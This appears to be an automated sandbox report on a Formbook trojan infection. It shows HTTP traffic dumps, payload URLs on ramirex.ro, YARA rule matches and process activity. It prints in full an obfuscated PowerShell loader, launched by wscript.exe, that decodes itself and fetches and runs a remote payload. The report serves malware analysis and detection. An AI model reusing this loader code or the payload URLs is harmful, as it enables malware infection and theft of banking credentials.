b3 f1 0c be 58 82 bf 6d 6b e4 3c 8b 97 83 79 76 b1 fe b8 e2 e4 3f 5d ad ee f8 73 31 59 be 0a e2 d3 20 af 10 1c 9b 82 9e 50 82 b4 45 5b b3 2f d0 09 0f 86 e9 ca 40 07 d6 00 55 ca 83 47 f7 80 6e 34 98 5f 07 ae 9b 23 a1 81 dc d9 f6 e1 f9 89 e5 98 f2 12 7f f0 48 ac 85 91 cf 4f 60 4e 04 34 4c fa fc 44 7c e2 e2 43 3c f8 d6 41 81 91 b7 fd 9d 18 d6 a6 77 4a 48 1b a9 d7 fa 85 da 82 b7 5a 15 8a f8 91 53 65 0e c0 18 fd fc 2f ff 82 50 50 4f ac a4 fd 89 f9 e3 6a 75 b3 be bd 5d 0e be e1 16 6e fb 8a 40 70 c5 3c 5c 5b d4 12 0b 0e 37 48 00 df 01 ae 6d 87 8e 7d d9 ee fb 77 dd f9 51 e9 fa 97 cd ea 0c c6 a7 b2 98 ce b6 b3 c9 6c 36 7d 2b df 6f df e2 58 9e be c3 f7 62 36 1d 9f 4e c4 94 ed 7f 11 9b 67 87 16 64 61 ea 97 83 c1 fc 4d 9a 0e 00 20 85 af a6 b4 8e 5a 23 08 f5 7e 08 9f 55 e1 ac b7 25 41 c5 7e 09 29 59 5f 40 a1 91 ad 07 83 5d 04 25 25 0a 6a 1d 0f 2f 59 d8 f0 30 bb 90 f3 fa b1 d1 d6 71 8b 60 53 72 cb 10 c2 40 83 2d 23 46 b0 2b ce 59 77 e2 a1 46 ef c5 0e 81 9b 9a 90 65 f7 6a a1 75 32 04 df 60 a1 4a 55 f0 69 1f 41 9a 23 99 8a b1 7f 4d 4e d9 08 42 3f fc 5d 90 67 88 b3 31 3e 62 14 79 b0 dd 41 ed a8 35 82 3b db 42 c1 44 21 32 50 86 cc ca 61 84 6c 5b 02 45 9c 59 c3 4c b4 e7 09 51 c5 3d 7f 2c 94 bc 55 e0 3b 45 45 c5 68 ad 51 46 44 c2 39 3b 8a 15 1d 35 7c 32 82 3c 10 d7 28 0c e7 69 4b de ed 96 f7 f8 a0 d2 8b fa 8a ed fe 05 07 c2 21 4f a2 f1 ec 5e df 6e 89 a5 68 35 8d a2 d6 66 73 0b 42 77 62 ef 8f 85 fe 8a ef 99 03 89 b6 66 17 41 68 6c bb ab 42 09 b5 b8 c7 3f 78 56 89 a6 d9 87 84 31 02 3a eb ee 05 6f 06 d7 cb 7d 39 18 e1 55 dd 68 3c e3 e5 91 7d 47 fb 0e c6 f8 63 13 d9 9b 8a 47 64 ab 76 5c 6d dd ef af 56 ac d8 ef 2c cb 37 ad af d8 dc 08 b2 61 8c c2 68 94 ea 01 a1 62 b1 50 31 2f 29 50 87 9a af fa 16 43 ad 8c aa db fa 50 ff d5 8b 8f 7d df b8 4d f8 28 0a d2 bc 16 c1 ed bd 6d 4f b8 74 c7 7f b6 ea 58 bd 53 bb 8a 78 31 bb 48 91 2e 07 ff 01 0c 51 4e 35 f9 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 36buTMo8WLu[mE8PE1?v~I&973Y]wk?_OsH,6=Uxe/$Qse]]dzyr$,pZ")]
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 36 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 b2 9c 26 86 9b d4 36 d0 c6 5e c4 40 da 04 89 8a 22 47 9a 1a 59 44 28 52 4b 8e a2 18 d8 3f 94 f3 fe 84 fc b1 1d 8a 76 36 fd 3a c9 24 e7 bd 37 f3 66 c6 b3 77 cb eb 8b fc fe 66 05 97 f9 97 2b b8 f9 f6 f9 6a 7d 01 49 9a 65 df 4f 2e b2 6c 99 2f e3 c3 e9 68 7c 9c 65 ab af 09 24 15 51 73 9e 65 5d d7 8d ba 93 91 75 db 2c bf cd 2a aa f5 69 e6 c9 29 49 a3 82 8a 64 31 98 85 3b d0 c2 6c e7 49 e9 fa 0b 14 05 df d7 48 02 02 4b 8a 7f b7 ea 71 9e 5c 58 43 68 28 cd 77 0d 26 20 e3 69 9e 10 3e 51 4f fc 11 64 25 9c 47 9a b7 54 a6 1f 02 55 cf 61 44 8d f3 c4 d9 8d 25 ff 06 67 ac c1 a1 b1 ca 14 f8 c4 df d2 6a 6d bb 57 d0 5b 61 29 64 85 69 10 74 56 ff c0 90 f6 4f bf 05 35 4e 6c 6b f1 87 e8 7c 9d 5f ad 16 a7 e3 53 f8 6a 09 fe b2 ad 29 66 59 bc 1c cc b2 cb d5 a7 25 27 ff f9 7a 79 cf 9f cb e3 c5 9b 20 3e 0d f2 0a c1 b1 29 e8 09 0b 28 ac 6c 6b f6 05 3a e1 c1 30 5d 19 e8 c0 1a a0 4a 79 f0 e8 1e d1 8d 06 b3 9b c0 75 7b 20 34 90 3b db 3e be 3c b3 1c 53 5e e1 ff 3c 05 d6 c2 14 2f cf 60 8e 04 34 4c fa f2 4c 7c e2 e2 43 3c f8 d6 81 c4 c8 db fe 4a 0c 2b d3 3b 25 0a 1b a9 57 fa 95 da 82 b7 5a 49 45 fc c8 a9 32 07 60 8c 7e f9 97 7f 41 28 a8 27 56 85 fd 81 f9 d3 72 79 bb ba bb 5b 0c be e3 06 ee fa 8a 40 70 c5 3c 5c 1b d4 05 4a 0e 37 48 00 ff 00 dc d8 0e 1d fb b2 d9 f5 ef ba f3 a3 d2 f5 2f eb e5 39 94 72 3a 3e 91 d3 0f 63 89 c7 9b e9 f4 6c 33 9d 4c 26 63 2c 70 22 df 9f e1 c9 19 db ff 2a 36 cb f6 2d c8 c2 d4 2f 06 83 d9 bb 34 1d 00 40 0a df 4c 69 1d b5 46 10 ea dd 10 be 28 e9 ac b7 25 41 c5 7e 89 a2 60 7d 01 52 23 5b 0f 06 bb 08 4a 4a 14 d4 3a 1e 5e b2 b0 e6 61 76 21 e7 d5 53 a3 ad e3 16 c1 ba e4 96 21 84 81 06 5b 46 8c 60 57 9c b3 ee c8 43 8d de 8b 2d 02 37 35 21 cb ee d5 42 eb 64 08 be 41 a9 4a 25 f9 b4 8b 20 cd 91 4c c5 d8 c9 f1 7b 36 82 d0 0f 7f 15 e4 19 e2 6c 8c 8f 18 45 1e 6c b7 57 3b 68 8d e0 de b6 20 99 28 44 06 ca 90 59 39 8c 90 4d 4b a0 88 33 6b 98 89 76 3c 21 4a 3e f0 c7 42 c9 5b 05 be 53 24 2b 46 6b 8d 45 44 24 9c b3 a3 58 d1 41 c3 27 23 c8 03 71 8d c2 70 9e b6 e4 dd 6e 79 8f f7 2a bd a8 af d8 ee 9f 70 20 1c f2 24 1a cf ee f5 ed 2e b0 14 ad a6 51 d4 5a af ef 40 e8 4e ec fc a1 d0 9f f1 3d 73 20 d1 d6 6c 23 08 8d 6d b7 55 28 a1 16 0f f8 1b cf 2a d1 34 bb 90 30 46 40 67 dd 83 e0 cd e0 7a b9 2f 7b 23 bc aa 1b 8d e7 bc 3c 45 df d1 be 83 31 fe d0 44 f6 a6 e2 11 d9 a8 2d 57 5b f7 fb ab 15 2b f6 3b cb f2 4d eb 2b 36 37 82 6c 18 a3 30 1a a5 7a 44 a8 58 2c 54 cc 4b 0a d4 a1 e6 ab be c5 50 2b a3 ea b6 de d7 7f fd ea 63 df 37 6e 13 3e 09 49 9a d7 22 b8 bd b3 ed 11 97 ee f8 cf 56 1d aa 77 6a 5b 11 2f 66 17 29 d2 c5 e0 3f 09 0f 7c a5 f9 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 36auTMo8WLu&6^@"GYD(RK?v6:$7fwf+j}IeO.l/h|e$Qse]u,*i)Id1;lI
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesData Raw: 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 65 6c 64 65 63 6f 72 2e 6e 65 74 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 20 20 7c 20 20 49 44 3a 20 61 32 61 66 61 37 63 66 30 34 62 66 30 33 61 61 66 62 31 62 37 36 33 33 30 30 37 36 34 32 38 39 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20
          Source: powershell.exe, 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.1781282776.0000020617316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ramirex.ro
          Source: powershell.exe, 00000002.00000002.1781282776.0000020615568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650625908.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000002.00000002.1781282776.0000020615568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000E.00000002.1650625908.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.1781282776.00000206167A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000002.00000002.1781282776.0000020615787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1781282776.0000020616E42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro
          Source: wab.exe, 00000012.00000002.1866014372.0000000006A18000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/
          Source: wab.exe, 00000012.00000002.1866014372.0000000006A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/)6
          Source: wab.exe, 00000012.00000002.1866014372.0000000006A18000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1865972215.0000000006970000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bin
          Source: wab.exe, 00000012.00000002.1865972215.0000000006970000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.binBestobs194.59.30.6/HtwvlcDSFcrAhhcHdD97.bin
          Source: wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bina
          Source: powershell.exe, 00000002.00000002.1781282776.0000020615787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/Rutschebanes.qxdP
          Source: powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/Rutschebanes.qxdXR
          Source: wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/u
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.7:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.7:49707 version: TLS 1.2

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: amsi32_7668.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 6600, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6654
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6654
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6654Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6654Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542C70 NtFreeVirtualMemory,LdrInitializeThunk,18_2_22542C70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_225435C0 NtCreateMutant,LdrInitializeThunk,18_2_225435C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542DF0 NtQuerySystemInformation,LdrInitializeThunk,18_2_22542DF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22544650 NtSuspendThread,18_2_22544650
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22544340 NtSetContextThread,18_2_22544340
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22543D70 NtOpenThread,18_2_22543D70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542C60 NtCreateKey,18_2_22542C60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542B60 NtClose,18_2_22542B60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542F60 NtCreateProcessEx,18_2_22542F60
